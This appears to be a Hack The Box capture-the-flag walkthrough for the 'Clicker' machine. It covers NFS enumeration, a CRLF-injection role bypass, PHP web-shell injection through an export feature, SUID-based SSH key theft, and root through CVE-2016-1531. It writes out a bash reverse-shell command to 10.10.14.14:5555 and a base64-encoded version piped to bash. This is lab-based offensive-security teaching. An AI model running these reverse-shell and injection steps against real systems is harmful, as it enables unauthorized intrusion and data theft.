HTB Clicker: Walkthrough
We begin with an open NFS mount that contains a webservers source code backup. Through analysing it, we can find a CRLF Injection vulnerability, mallowing us to gain access to an admin.php
endpoint. We can then leverage that endpoint to perform an SQL injection attack, gaining RCE on the host. The Privilege escalation involves exploiting a vulnerable binary to read a users SSH key. This finally ends with us abusing sudo privileges on a script alongside CVE-2016-1531
to gain root access.
0) Machine Overview
1) Scans
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
|_ 256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34963/udp mountd
| 100005 1,2,3 36427/udp6 mountd
| 100005 1,2,3 43273/tcp mountd
| 100005 1,2,3 59335/tcp6 mountd
| 100021 1,3,4 34348/udp6 nlockmgr
| 100021 1,3,4 35611/tcp nlockmgr
| 100021 1,3,4 39272/udp nlockmgr
|_ 100021 1,3,4 44029/tcp6 nlockmgr
2049/tcp open nfs 3-4 (RPC #100003)
35611/tcp open nlockmgr 1-4 (RPC #100021)
38251/tcp open status 1 (RPC #100024)
43273/tcp open mountd 1-3 (RPC #100005)
57085/tcp open mountd 1-3 (RPC #100005)
59583/tcp open mountd 1-3 (RPC #100005)
2) NFS Enumeration
Let’s first check out this NFS mount:
Lets try mounting it:
We’ll just copy that file and put it into another directory, that isn’t where the mount is located, and then unzip it. We should find what seems to be the web applications source code:
3) Web Enumeration
Lets analyze these files and see what interesting information we can find.
Firstly, I notice there are multiple parameters that are given to the user on creation:
I first tried a sort of mass-assignment and tried giving the role to myself on creation, but that didn’t work.
However, some parameters are passed in the URL when saving the game at /save_game.php
:
So I thought, what if we try passing the role parameter in there as well, and setting it to Admin
? Well reviewing the source code, that isn’t possible:
But this got me thinking of ways to bypass this security check.
- I tried URL Encoding the word
role
, but it caught it. - I tried using unicode characters, different languages, but none of it worked.
Eventually, I came across a method called CRLF Injection
What this is basically going to allow us to do is, since I’m assuming its checking for the role
keyword in the URL parameter, we can inject the characters CRLFCRLF
, making sure they are URL-encoded, and then specify our role
parameter. And what that will do is basically fool the web-application into thinking that the body of the HTTP request begins right after the CRLF characters.
Now if we log out and log back in, we should be able to access /admin.php
. The reason we need to re-log is because if we look back at the source code, it checks our SESSION
id to then decide if we’re authorized to access it or not.
Now all we have access to is an Export
function or mechanism. One thing I noticed while looking through the source code was that, of all the functions within the source code, they all used prepared statements… Except one:
And that variable in this case, seems to be $threshold
.
And if we go to export these top players, and intercept the request:
And then inject some SQL into it…. It doesn’t work :(
I tried for quite a while with different payloads, but I just couldn’t get it to work. So I moved on from trying to perform SQLi.
I did however try messing with the extension. Now normally, it only allowed for either .txt, .pdf, .html
. But if we manually change it ourselves through burp, we can specify php
, and it would work.
Combine that with the fact that the SQL query is retrieving nickname
, we can try injecting some of our own PHP code using save_game.php
into the nickname
parameter, and then hopefully, we’ll be able to get a web shell.
Had to make a new user as the settings reset.
Lets get a full shell now.
1
2
3
4
5
6
First i base64 encoded:
/bin/bash -i >& /dev/tcp/10.10.14.14/5555 0>&1
and then i use that as the payload with echo, then base64 decode it, and then execute bash.
echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0LzU1NTUgMD4mMQo=%20|%20base64%20-d%20|%20bash
4) Privilege Escalation
First lets check out that db since we have credentials for it from our source-code.
Tried cracking a few of these see to if there’s anything worth-while. Couldn’t crack any.
If we check for SUIDs:
An interesting file in /opt/manage shows up.
Lets take the executable offline and try reversing it to see how it functions.
So it seems that it has its base 4 cases, but then if the case falls outside of any of those 4, it defaults to the default
case shown at the bottom. We cant know for sure what the command is doing with what we know, but we can assume that its going to read out a file since one of the else
functions in the code shows:
Lets try having it read some files.
Have it read jack’s id_rsa
:
Before we try SSHing in, we’ll need to fix the format of the key by adding a few -
at the start and end of the id_rsa, since as u can see, the format is a little messed up as is:
I had to add 2 -
to the start and end for it to work.
Now we can finally SSH in:
5) Privilege Escalation 2
Lets run a quick sudo -l
:
Checking out the file:
I originally had tried a method where I made my own set
binary, set it as an alias and within my PATH, hoping that it would execute before the script sets my PATH manually, but that didn’t work.
With some further enumeration (mainly wondering why that SETENV
privilege was given to us) and some help, the vulnerability lies in that xml_pp
is a perl script that’s vulnerable to CVE-2016-1531
To exploit it, we set 2 variables, one setting /bin/bash
as a SUID, as we execute the file:
Pwned.